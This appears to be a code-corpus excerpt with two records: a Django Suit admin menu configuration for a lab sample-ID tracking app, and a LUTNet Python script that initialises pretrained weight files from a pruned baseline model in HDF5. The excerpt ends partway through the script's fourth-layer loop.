from django.conf import settings from suit import apps from suit.apps import DjangoSuitConfig from suit.menu import ParentItem, ChildItem APP_NAME = settings.APP_NAME WIKI_URL = settings.WIKI_URL class SuitConfig(DjangoSuitConfig): name = 'suit' verbose_name = 'Mbiome Core JAXid Generator' site_title = 'Mbiome Core JAXid Tracking' site_header = site_title index_title = verbose_name layout = 'vertical' list_per_page = 35 # header_date_format = 'l, d-M-o' # header_time_format = 'H:i e' menu = ( ParentItem('JAX Id Record Lists', use_first_child_url=True, url='', children=[ ChildItem('JAXid Records', model='id_generate.jaxiddetail'), ChildItem(model='id_generate.boxid'), ChildItem(model='id_generate.plateid'), ], icon='fa fa-list-ul'), ParentItem('Reference Data', use_first_child_url=True, url='', children=[ ChildItem(model='id_generate.projectcode'), ChildItem(model='id_generate.nucleicacidtype'), ChildItem(model='id_generate.sampletype'), ChildItem(model='id_generate.sequencingtype'), ], icon='fa fa-list'), ParentItem( label='Generate new JAXid''s', url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/', permissions='id_generate.change_jaxiddetail', icon='fa fa-rocket'), ParentItem( label='Generate new Box ID''s', url=f'/{APP_NAME}/manage/id_generate/boxid/import/', permissions='id_generate.change_boxid', icon='fa fa-cube'), ParentItem( label='Generate new Plate ID''s', url=f'/{APP_NAME}/manage/id_generate/plateid/import/', permissions='id_generate.change_plateid', icon='fa fa-circle-o-notch'), ParentItem( label='Authorization', children=[ ChildItem('Staff', model='auth.user'), ChildItem(model='auth.group'), ChildItem(model='admin.logentry'), ], icon='fa fa-user-circle'), ParentItem( label='SOP and Request Sheet', use_first_child_url=False, url='', children=[ ChildItem('View JAX ID Request SOP', target_blank=True, url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'), ChildItem('View JAX ID Request Template Sheet', url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'), ], icon='fa fa-file'), ) # menu_handler = None menu_show_home = False # Show changelist top actions only if any row is selected toggle_changelist_top_actions = False # # Enables two column layout for change forms with submit row on the right form_submit_on_right = False # Hide name/"original" column for all tabular inlines. # May be overridden in Inline class by suit_form_inlines_hide_original = False #form_inlines_hide_original = False form_size = { 'default': apps.SUIT_FORM_SIZE_LARGE, 'widgets': { 'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE, 'Textarea': apps.SUIT_FORM_SIZE_X_LARGE, }, } # form_size setting can be overridden in ModelAdmin using suit_form_size parameter # # Example: # ---------------------------------------------- # suit_form_size = { # 'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10', # 'fields': { # 'field_name': SUIT_FORM_SIZE_LARGE, # 'field_name2': SUIT_FORM_SIZE_X_LARGE, # }, # 'widgets': { # 'widget_class_name': SUIT_FORM_SIZE_FULL, # 'AdminTextareaWidget': SUIT_FORM_SIZE_FULL, # }, # 'fieldsets': { # 'fieldset_name': SUIT_FORM_SIZE_FULL, # 'fieldset_name2': SUIT_FORM_SIZE_FULL, # } # }
[((43, 12, 47, 36), 'suit.menu.ParentItem', 'ParentItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((48, 12, 52, 34), 'suit.menu.ParentItem', 'ParentItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((53, 12, 57, 44), 'suit.menu.ParentItem', 'ParentItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((28, 20, 28, 79), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((29, 20, 29, 56), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((30, 20, 30, 58), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((37, 20, 37, 62), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((38, 20, 38, 66), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((39, 20, 39, 61), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((40, 20, 40, 65), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((61, 20, 61, 57), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((62, 20, 62, 49), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((63, 20, 63, 53), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((72, 20, 74, 175), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n'), ((75, 20, 76, 197), 'suit.menu.ChildItem', 'ChildItem', (), '', False, 'from suit.menu import ParentItem, ChildItem\n')]
awai54st/LUTNet
tiled-lutnet/training-software/MNIST-CIFAR-SVHN/models/MNIST/scripts/lutnet_init.py
81b044f31d1131bee1a7fae41fc4d2fb102ea73a
import h5py import numpy as np np.set_printoptions(threshold=np.nan) from shutil import copyfile copyfile("dummy_lutnet.h5", "pretrained_bin.h5") # create pretrained.h5 using datastructure from dummy.h5 bl = h5py.File("baseline_pruned.h5", 'r') #dummy = h5py.File("dummy.h5", 'r') pretrained = h5py.File("pretrained_bin.h5", 'r+') # dense layer 1 bl_w1 = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"] zero_fill = np.zeros(np.shape(np.array(bl_w1))) pret_w1 = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"] pret_w1[...] = np.array(bl_w1) p_gamma[...] = np.array(bl_gamma) pret_pruning_mask[...] = np.array(bl_pruning_mask) print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 2 bl_w1 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 3 bl_w1 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 4 bl_w1 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) 